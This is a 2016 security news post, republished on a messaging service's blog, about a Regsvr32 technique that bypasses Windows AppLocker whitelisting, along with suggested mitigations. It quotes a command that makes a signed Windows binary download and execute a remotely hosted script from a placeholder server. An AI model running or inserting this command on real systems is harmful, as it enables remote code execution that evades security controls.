SafeUM
Home Blog Services Download Help About Recharge

Axarhöfði 14, 110 Reykjavik, Iceland

Iceland - 2015
SafeUM
Blog
Services
Download
Help
About
Recharge
Menu
Archive
TOP Security!
26 Apr 2016

Researcher uses Regsvr32 function to bypass AppLocker

For years, business-focused versions of Windows have had an AppLocker feature that lets you blacklist or whitelist apps.

It's undoubtedly helpful for companies eager to keep malware (or just risky software) off their network. A researcher in Colorado has discovered a feature in Regsvr32 that allows an attacker to bypass application whitelisting protections, such as those afforded by Microsoft's AppLocker.

If the technique is used, there's little evidence left behind for investigators, as the process doesn't alter the system registry and in some cases comes across as normal Internet Explorer traffic. Casey Smith, a researcher in Colorado, needed to install a reverse shell, but the workstation in question was locked down by AppLocker and script rules. After some trial an error, he discovered an interesting solution: regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

"The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. ... And ... You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control," Smith wrote.

How to respond to ransomware threats

Up until this week, few people – if any – knew that Regsvr32 could accept a URL for a script. This makes for some interesting developments, because all an attacker has to do is place the code block (VP or JS) inside the registration element. Smith published several proof-of-concept scripts, which other researchers confirmed work as expected.

If used, this command will make Red Team engagements a bit easier, and the same can be said about criminal attacks. It's certainly a neat trick. As Smith wrote, it doesn't alter the registry, it doesn't require administrative privileges, and the scripts can be called over HTTP or HTTPS. Salted Hash as reached out to Microsoft for comment, and we'll update this story if they chose to respond.

"Please note, the exploit described does not make any changes to the registry; monitoring of registry entries will not be effective," wrote an information security consultant in Southern California who goes by the handle Munin. Regsvr32 is whitelisted, seen as an essential system function. The problem is the un-sandboxed feature and network awareness, which is why it can accept URLs (external or local). "Kind of like early Web browsers, when JavaScript first came out," Munin explained to Salted Hash.

Munin said that a possible indicator of compromise could exist, as .sct files loaded onto the system might be found in the "Temporary Internet Files" folder. There is no patch available, but Munin suggests blocking Regsvr32.exe with Windows Firewall, which removes the network awareness. It's possible that blocks on Regsvr32.exe and Regsvr64.exe will be needed for full effectiveness.

Other researchers have said that Device Guard, fully enabled with script protection will block this bypass as well, but that would require that the organization have Windows 10 Enterprise and Hyper-V on the system in question. "This is a very severe vulnerability, as it allows for arbitrary code execution by a trusted program, and should be mitigated as soon as possible," Munin said.

Several readers have emailed (in addition to the comment below) to say that .sct files shouldn't be used as an indicator, as any file extension will work. This will make investigations all the more difficult until Microsoft does something about this function.

Tags:
Windows AppLocker information leaks
Source:
CSO Online
1899
Other NEWS
3 Jul 2020 safeum news imgage An encrypted messaging service has been infiltrated by police
4 May 2020 safeum news imgage Two-Factor Authentication ​What Is It and Why You Should Use It
12 Dec 2019 safeum news imgage Encryption is under threat - this is how it affects you
4 Nov 2019 safeum news imgage Should Big Decisions Be Based on Data or Your Intuition?
7 Jun 2018 safeum news imgage VPNFilter malware infecting 500,000 devices is worse than we thought
4 Jun 2018 safeum news imgage Hackers target Booking.com in criminal bid to steal hundreds of thousands from customers
1 Jun 2018 safeum news imgage Operator of World's Top Internet Hub Sues German Spy Agency
30 May 2018 safeum news imgage US says North Korea behind malware attacks
29 May 2018 safeum news imgage Facebook and Google targeted as first GDPR complaints filed
25 May 2018 safeum news imgage A new reason to not buy these cheap Android devices
24 May 2018 safeum news imgage Flaws in smart pet devices, apps could come back to bite owners
23 May 2018 safeum news imgage Google sued for 'clandestine tracking' of 4.4m UK iPhone users' browsing data
21 May 2018 safeum news imgage LocationSmart reportedly leaked phone location data onto the web
18 May 2018 safeum news imgage The SEC created its own scammy ICO to teach investors a lesson
17 May 2018 safeum news imgage Thieves suck millions out of Mexican banks in transfer heist
All news
SafeUM
Confidential Terms of Use Our technologies Company
Follow us
Download
SafeUM © Safe Universal Messenger

Axarhöfði 14,
110 Reykjavik, Iceland

Iceland - 2015